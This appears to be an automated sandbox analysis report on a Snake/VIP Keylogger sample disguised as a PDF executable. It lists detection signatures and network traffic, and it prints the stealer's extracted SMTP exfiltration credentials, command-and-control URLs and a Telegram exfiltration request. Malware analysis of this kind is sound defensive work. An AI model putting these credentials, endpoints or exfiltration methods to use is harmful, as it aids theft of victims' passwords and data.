Windows Analysis Report
PK241200518-EMAIL RELEASE-pdf.exe

Overview

General Information

Sample name: PK241200518-EMAIL RELEASE-pdf.exe
Analysis ID: 1577088
MD5: 6897b3d43af4aca3376a79d7169746db
SHA1: fec918d4e90a3697a78931ac4dab8dc6da637afb
SHA256: 23659bb599448db31b14bf56938cae2970929167fa41ad9d7e35cae65c1b4a64
Tags: exe, user-threatcat_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PK241200518-EMAIL RELEASE-pdf.exe (PID: 1264 cmdline: "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe" MD5: 6897B3D43AF4ACA3376A79D7169746DB)
    • RegSvcs.exe (PID: 5908 cmdline: "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x2dca0:$a1: get_encryptedPassword
  • 0x2e228:$a2: get_encryptedUsername
  • 0x2d913:$a3: get_timePasswordChanged
  • 0x2da2a:$a4: get_passwordField
  • 0x2dcb6:$a5: set_encryptedPassword
  • 0x309d2:$a6: get_passwords
  • 0x30d66:$a7: get_logins
  • 0x309be:$a8: GetOutlookPasswords
  • 0x30377:$a9: StartKeylogger
  • 0x30cbf:$a10: KeyLoggerEventArgs
  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x2bea0:$a1: get_encryptedPassword
  • 0x2c428:$a2: get_encryptedUsername
  • 0x2bb13:$a3: get_timePasswordChanged
  • 0x2bc2a:$a4: get_passwordField
  • 0x2beb6:$a5: set_encryptedPassword
  • 0x2ebd2:$a6: get_passwords
  • 0x2ef66:$a7: get_logins
  • 0x2ebbe:$a8: GetOutlookPasswords
  • 0x2e577:$a9: StartKeylogger
  • 0x2eebf:$a10: KeyLoggerEventArgs
  • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
  • 0x3947e:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38b21:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x38d7e:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3975d:$a5: \Kometa\User Data\Default\Login Data
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T00:30:29.869960+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49727 | 172.67.177.134 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T00:30:18.217728+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:21.706195+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:24.572922+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:28.135272+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:34.432138+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49733 | 132.226.8.169 | 80 | TCP
2024-12-18T00:30:42.150983+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49744 | 132.226.8.169 | 80 | TCP

                AV Detection

Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: PK241200518-EMAIL RELEASE-pdf.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PK241200518-EMAIL RELEASE-pdf.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49719 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007B445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_007B445A
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BC6D1 FindFirstFileW,FindClose, 0_2_007BC6D1
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_007BC75C
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_007BEF95
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_007BF0F2
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_007BF3F3
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007B37EF
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007B3B12
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_007BBCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 2_2_010EF4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 2_2_010EFB03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 2_2_010EFCE3

                Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2018/12/2024%20/%2023:50:08%0D%0ACountry%20Name:%20%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 172.67.177.134:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49719 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007C22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_007C22EE
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 17 Dec 2024 23:30:54 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBeq
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002F08000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.4548549275.0000000002F03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBeq
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49791 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.cs | .Net Code: TakeScreenshot
Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.cs | .Net Code: VKCodeToUnicode
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_007C4164
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_007C4164
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007C3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_007C3F66
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007B001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_007B001C
Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007DCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_007DCABC

                System Summary

                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
